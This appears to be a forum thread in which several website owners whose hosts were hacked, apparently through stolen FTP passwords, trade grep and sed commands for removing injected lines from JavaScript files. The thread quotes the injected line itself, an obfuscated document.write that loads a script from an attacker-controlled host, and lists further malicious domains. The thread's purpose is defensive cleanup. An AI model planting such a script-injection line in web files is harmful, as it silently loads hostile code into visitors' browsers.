My webbox got hacked and in all .js files I want to delete a specific string. The string I want to replace is the following: document.write('<sc'+'ript type="text/javascript" src="http://addle.diretctrishta.com:8080/Inbox.js"></scri'+'pt>'); I succeeded in having a complete list of files that contains this string by issuing the following command: grep -rl "document.write('<sc'+'ript type=\"text/javascript\" src=\"http://addle.diretctrishta.com:8080/Inbox.js\"></scri'+'pt>');" . now I want to invoke the sed command for each of the files but there the system refuses to work because of the regular expression the 's' parameter is expecting. normally the complete command would be: gerp -rl oldstring . | xargs sed -i -e 's/oldstring/newstring/' but since there are a lot of non alphanumeric chars in the "oldstring" the system refuses... any ideas to solve this?
This code remove the last line of every .js file that got that url. Code: #!/bin/sh files=`grep -rl "diretctrishta.com" --include=*.js .` for file in ${files[@]} do sed '$d' $file > tmp mv tmp $file done
There are many others domains like chargecardsystemsla that need to be removed. but I still didnt discover how the worm get in . I think it was a file from a crack that sniff ftp password
It was indeed an attack via ftp access... probably sniffed passwords. I used following commands to cleanup the complete htdocs folder recursively: Those were the urls I found on my box... maybe other domains were also used. Via the ftp logs I found out which files were altered and from those I derived the urls. The command looks for files which have the url inside (grep), and then removes the line with this url from that file (sed -i -e /url/d). Hope this can help. - - - - - - - - - - - - - - - - - - - - - - grep -rl "addle.diretctrishta.com:8080" . | xargs sed -i -e /addle.diretctrishta.com:8080/d grep -rl "d79b570e8c8ae7c1acdea199b5d43e66" . | xargs sed -i -e /d79b570e8c8ae7c1acdea199b5d43e66/d grep -rl "amble.southamericasolar.com" . | xargs sed -i -e /amble.southamericasolar.com/d grep -rl "utmost.dawnandjimmy.us" . | xargs sed -i -e /utmost.dawnandjimmy.us/d grep -rl "c74e3e9a551334df2b26f65cbe9d27b0" . | xargs sed -i -e /c74e3e9a551334df2b26f65cbe9d27b0/d
add 1 to the list of hacked sites The files where also uploaded via ftp. Just curious, which ftp software where you using ? I wonder if the trojan seeks for a specific password file ... FileZilla for example stores passwords in clear text.
The passwords in TC are in fact obfuscated but not encrypted, and from a trojan point of view, they are as insecure as a clear text file.
Hey, Seems I've also been attacked!! Could you direct me a little on exactly where to add the scripts you mentioned to remove the js line? i.e where to put the commands! Many thanks
You must put those commands on console. If you don't know this means, you will do better restoring a full backup of the site. And obviously change the ftp password.
